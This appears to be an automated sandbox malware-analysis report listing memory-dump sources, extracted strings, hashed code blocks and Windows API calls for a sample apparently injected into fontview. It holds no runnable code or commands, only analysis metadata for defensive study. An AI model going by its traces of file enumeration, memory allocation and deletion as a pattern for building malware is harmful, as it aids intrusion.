                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                                                    • Instruction ID: a763c13f3b3fd35034b132962ff3374e776d745f69dc8f709e6041be80a6c6d0
                                                                                    • Opcode Fuzzy Hash: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                                                    • Instruction Fuzzy Hash: DF510575A00645EECFA0DF6CC89087FFBFAEB44304B148469F996C7642DAB4EB448760
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                                                    • Execute=1, xrefs: 01814713
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                                                    • ExecuteOptions, xrefs: 018146A0
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                                                    • Instruction ID: 7b097f368ebb665cb93e43f7e2a5e02edfaeee40870442d8fb6aaa1af2cbc58e
                                                                                    • Opcode Fuzzy Hash: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                                                    • Instruction Fuzzy Hash: FE51397164021DBAEF15EBA8DC99FA9B7B8EF18318F1404D9D605E7181E7709B41CF50
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: 5270ccefbae1948bd2d263e772e859e8675d989e5a3d3594791f77230a13a856
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: 2A81D070E852498EEF298E6CC8997FEFFF1AF8D320F18415AD951A7691C7309840CB91
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 0181031E
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                                                    • Instruction ID: e3e343046a924aa3b60de1bb6b10601b9353a372f1a57e35a2a5bc4bbf46d1a4
                                                                                    • Opcode Fuzzy Hash: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                                                    • Instruction Fuzzy Hash: 42E1BE316047419FD726CF28C884B6AFBE5BB88B14F140A6DF5A5CB2E1D774DA84CB42
                                                                                    Strings
                                                                                    • RTL: Resource at %p, xrefs: 01817B8E
                                                                                    • RTL: Re-Waiting, xrefs: 01817BAC
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                                    • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                                                    • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                                                    • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                                                    Strings
                                                                                    • RTL: Resource at %p, xrefs: 018172A3
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                                                    • RTL: Re-Waiting, xrefs: 018172C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                                                    • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                                                    • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                                                    • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                                    • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                                                    • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                                                    • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                                    • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                                                    • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                                                    • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0

                                                                                    Execution Graph

                                                                                    Execution Coverage:3.1%
                                                                                    Dynamic/Decrypted Code Coverage:4.2%
                                                                                    Signature Coverage:2.2%
                                                                                    Total number of Nodes:449
                                                                                    Total number of Limit Nodes:74
30295ea NtDeleteFile 82114->82115 82117 302c7e0 82118 302b6e0 RtlFreeHeap 82117->82118 82119 302c7f5 82118->82119 82120 3013223 82121 3017e70 2 API calls 82120->82121 82122 3013233 82121->82122 82123 3029600 NtClose 82122->82123 82124 301324f 82122->82124 82123->82124 82125 3010f2b PostThreadMessageW 82126 3010f3d 82125->82126 82127 301f970 82128 301f9d4 82127->82128 82129 30163c0 2 API calls 82128->82129 82131 301fb07 82129->82131 82130 301fb0e 82131->82130 82156 30164d0 82131->82156 82133 301fcb3 82134 301fcc2 82136 3029600 NtClose 82134->82136 82135 301fb8a 82135->82133 82135->82134 82160 301f750 82135->82160 82139 301fccc 82136->82139 82138 301fbc6 82138->82134 82140 301fbd1 82138->82140 82141 302b7c0 RtlAllocateHeap 82140->82141 82142 301fbfa 82141->82142 82143 301fc03 82142->82143 82144 301fc19 82142->82144 82145 3029600 NtClose 82143->82145 82169 301f640 CoInitialize 82144->82169 82147 301fc0d 82145->82147 82148 301fc27 82172 30290d0 82148->82172 82150 301fca2 82151 3029600 NtClose 82150->82151 82152 301fcac 82151->82152 82153 302b6e0 RtlFreeHeap 82152->82153 82153->82133 82154 301fc45 82154->82150 82155 30290d0 LdrInitializeThunk 82154->82155 82155->82154 82157 30164f5 82156->82157 82176 3028f60 82157->82176 82161 301f76c 82160->82161 82162 3014650 LdrLoadDll 82161->82162 82164 301f78a 82162->82164 82163 301f793 82163->82138 82164->82163 82165 3014650 LdrLoadDll 82164->82165 82166 301f85e 82165->82166 82167 3014650 LdrLoadDll 82166->82167 82168 301f8bb 82166->82168 82167->82168 82168->82138 82171 301f6a5 82169->82171 82170 301f73b CoUninitialize 82170->82148 82171->82170 82173 30290ea 82172->82173 82181 5012ba0 LdrInitializeThunk 82173->82181 82174 302911a 82174->82154 82177 3028f7a 82176->82177 82180 5012c60 LdrInitializeThunk 82177->82180 82178 3016569 82178->82135 82180->82178 82181->82174 82183 3017230 82184 301724c 82183->82184 82188 301729f 82183->82188 82186 3029600 NtClose 82184->82186 82184->82188 82185 30173d7 82187 3017267 82186->82187 82193 
3016650 NtClose LdrInitializeThunk LdrInitializeThunk 82187->82193 82188->82185 82194 3016650 NtClose LdrInitializeThunk LdrInitializeThunk 82188->82194 82190 30173b1 82190->82185 82195 3016820 NtClose LdrInitializeThunk LdrInitializeThunk 82190->82195 82193->82188 82194->82190 82195->82185 82196 3015cb0 82197 30181f0 LdrInitializeThunk 82196->82197 82198 3015ce0 82196->82198 82197->82198 82201 3018170 82198->82201 82200 3015d05 82202 30181b4 82201->82202 82203 30181d5 82202->82203 82208 3028920 82202->82208 82203->82200 82205 30181c5 82206 30181e1 82205->82206 82207 3029600 NtClose 82205->82207 82206->82200 82207->82203 82209 302899a 82208->82209 82211 302894b 82208->82211 82213 5014650 LdrInitializeThunk 82209->82213 82210 30289bf 82210->82205 82211->82205 82213->82210 82214 3020270 82215 3020293 82214->82215 82216 3014650 LdrLoadDll 82215->82216 82217 30202b7 82216->82217

                                                                                    Control-flow Graph (figure; legend: Executed, Not Executed)
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &;$&X$07$5T$;s$A$Kj$Z$_QlVKj$e$oa$~$~D$X$d
                                                                                    • API String ID: 0-3847398102
                                                                                    • Opcode ID: 258605563252ec02880893b3bc2e24088d5aed0290a2bd5645d4f2ebb6d941fd
                                                                                    • Instruction ID: f15a949842c930cfb1f799710c2055f5484ed941807f6a1280596bd42b984808
                                                                                    • Opcode Fuzzy Hash: 258605563252ec02880893b3bc2e24088d5aed0290a2bd5645d4f2ebb6d941fd
                                                                                    • Instruction Fuzzy Hash: B012F5B0E06229CFEB24CF98C8947EDBBB1FF44308F148199D509AB281D7795A85CF55
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 0301C7E4
                                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 0301C81F
                                                                                    • FindClose.KERNELBASE(?), ref: 0301C82A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 3541575487-0
                                                                                    • Opcode ID: 140c45ad7ed1789373bcfe2a44afe739e1a5bcbcc8990cb583f84032add19790
                                                                                    • Instruction ID: a52e16939ac4587c664301f2cbbf0544fba606cf1e2fb2999ab132e915e72c93
                                                                                    • Opcode Fuzzy Hash: 140c45ad7ed1789373bcfe2a44afe739e1a5bcbcc8990cb583f84032add19790
                                                                                    • Instruction Fuzzy Hash: 9831B6B5941308BBEB24DFA4CC85FEF77BC9F85744F144058B908AB1C0D6B0AA95CBA1
                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 030293FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 34b98089489fcee320466ab6707d416bb4d5332a27b35b02a639f2c190a2acc1
                                                                                    • Instruction ID: 41f35fba331b95ca723f0ea76615d04af45579c2907c977bd3f7f0d637e4984e
                                                                                    • Opcode Fuzzy Hash: 34b98089489fcee320466ab6707d416bb4d5332a27b35b02a639f2c190a2acc1
                                                                                    • Instruction Fuzzy Hash: 893195B5A01608AFDB54DF99D881EDEBBF9EF8C314F108119FD18A7340D630A951CBA5
                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03029556
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 20c90b30256ad246525526b73c38bcb6b8b33cb5b389bbf1a347d5acf39c0346
                                                                                    • Instruction ID: 5bb722cc3d6a4121d0eeb8ed3e616335ffd728cad1fda85c4e0d6075a08587a7
                                                                                    • Opcode Fuzzy Hash: 20c90b30256ad246525526b73c38bcb6b8b33cb5b389bbf1a347d5acf39c0346
                                                                                    • Instruction Fuzzy Hash: 6B31C9B5A01608AFDB14DF98D880EDFBBF9EF88314F108219FD18A7340D630A951CBA5
                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(03011EBE,?,030280FF,00000000,00000004,00003000,?,?,?,?,?,030280FF,03011EBE,BE8D4F4E,03011EBE,00000000), ref: 03029838
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: 7135e00bcafa40e88fa395f011b7bd0db920fceb8b0d479973e0ed4ab716e7fc
                                                                                    • Instruction ID: 7c1fc96d61f36a6e9bd152b4619a815fdd24a765cace8bd98316fb243ab26220
                                                                                    • Opcode Fuzzy Hash: 7135e00bcafa40e88fa395f011b7bd0db920fceb8b0d479973e0ed4ab716e7fc
                                                                                    • Instruction Fuzzy Hash: 8221FF75A01609AFDB14DF98DC81EEF7BB9EF88310F108109FD18A7240D770A951CBA1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    • Opcode ID: 4a3721d8a29282ed27fe08d4f1e735d741e64edec40d4e9b22e22086d4773e89
                                                                                    • Instruction ID: 02b0240bd6641d044055a76f01ffc85aca2953ee83a72febf25ba215f42fcb8c
                                                                                    • Opcode Fuzzy Hash: 4a3721d8a29282ed27fe08d4f1e735d741e64edec40d4e9b22e22086d4773e89
                                                                                    • Instruction Fuzzy Hash: BB115E79A027187BD620EB54CC41FEB7BACDF85714F108149F9186B280DA706955CBA1
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03029634
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 4e38c00dae261bef75bf053dafa103ddf5257f9c4bce10d2ce9fad77e1b094bc
                                                                                    • Instruction ID: 2254583ff08fc59d38ad05c84cb278b9f8e99881747604b721d637ee624e23d7
                                                                                    • Opcode Fuzzy Hash: 4e38c00dae261bef75bf053dafa103ddf5257f9c4bce10d2ce9fad77e1b094bc
                                                                                    • Instruction Fuzzy Hash: 63E04F3A2012147BD210EA59DC40FDB776CDBC6750F108019FA1C6B140CA70B90187F0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 81b5211f1844a1d2689e5106e65798286d405b872eb7227c8fee7b05a8812b57
                                                                                    • Instruction ID: cc7892d7d8ce50fa54d0286c2a2753e8ef875087ec0140f5a5ce9f7eb40853f7
                                                                                    • Opcode Fuzzy Hash: 81b5211f1844a1d2689e5106e65798286d405b872eb7227c8fee7b05a8812b57
                                                                                    • Instruction Fuzzy Hash: 2290023660561402E1007158955570A10158BD0201FA5C412A0424568D8B958A5165A2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f3a1044409e1c979311a8daa904e034c0f6268150e72a059d0a6cfb3df6e6ce3
                                                                                    • Instruction ID: 2e905062992ac01b088a7bf84ea5c9ef8e45bd94f85a7eda2d3026aa8a79a24d
                                                                                    • Opcode Fuzzy Hash: f3a1044409e1c979311a8daa904e034c0f6268150e72a059d0a6cfb3df6e6ce3
                                                                                    • Instruction Fuzzy Hash: EC9002666016104251407158984540A60159BE13013D5C116A0554560C8A1889559269
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 30a192af3670ed123c4d39cc1646db8c269271e26e96b5fe31a452c532608451
                                                                                    • Instruction ID: 34549410ceff239aae992450ff3cbef7ba6fa35a323b4caefc494e668b17da75
                                                                                    • Opcode Fuzzy Hash: 30a192af3670ed123c4d39cc1646db8c269271e26e96b5fe31a452c532608451
                                                                                    • Instruction Fuzzy Hash: 7D90023660591012A140715898C554A40159BE0301B95C012E0424554C8E148A565361
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0e31ab62774b2faab1bf5a7df7143caf8e4fbd80dcb76733b17ddaa059fb1ee5
                                                                                    • Instruction ID: 90313492260e1a5c902c5e9603005ba52fd5cda4b104bba49217ddcda4d69162
                                                                                    • Opcode Fuzzy Hash: 0e31ab62774b2faab1bf5a7df7143caf8e4fbd80dcb76733b17ddaa059fb1ee5
                                                                                    • Instruction Fuzzy Hash: 9290022E21351002E1807158A44960E00158BD1202FD5D416A0015558CCD1589695321
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e51139722c97b769a80c8bd9e5d09a5e024b9728e4d297e9401cb76debb6455b
                                                                                    • Instruction ID: 1d6e084779e21815a03a26dfc4f137586ec306424a53a9c4a02c760836d6f4bd
                                                                                    • Opcode Fuzzy Hash: e51139722c97b769a80c8bd9e5d09a5e024b9728e4d297e9401cb76debb6455b
                                                                                    • Instruction Fuzzy Hash: 0990022630151003E1407158A45960A4015DBE1301F95D012E0414554CDD1589565222
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3a8cb86d0921b1e436e41b448f0472a3ae2e0574d06e769ddff240bf1684219d
                                                                                    • Instruction ID: 304631f5c28fce24f77cc6f82105bda6897afc9380e3d8c5a6a5226fbb3118f4
                                                                                    • Opcode Fuzzy Hash: 3a8cb86d0921b1e436e41b448f0472a3ae2e0574d06e769ddff240bf1684219d
                                                                                    • Instruction Fuzzy Hash: 3690023620151802E1807158944564E00158BD1301FD5C016A0025654DCE158B5977A1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e6eabccd4381a936839e65650382af6e11fe89b1f28641763965f83b4025886b
                                                                                    • Instruction ID: 10a676f7acba9947304bb8977130577b035ea6612232b849ac9b6a5fb341a650
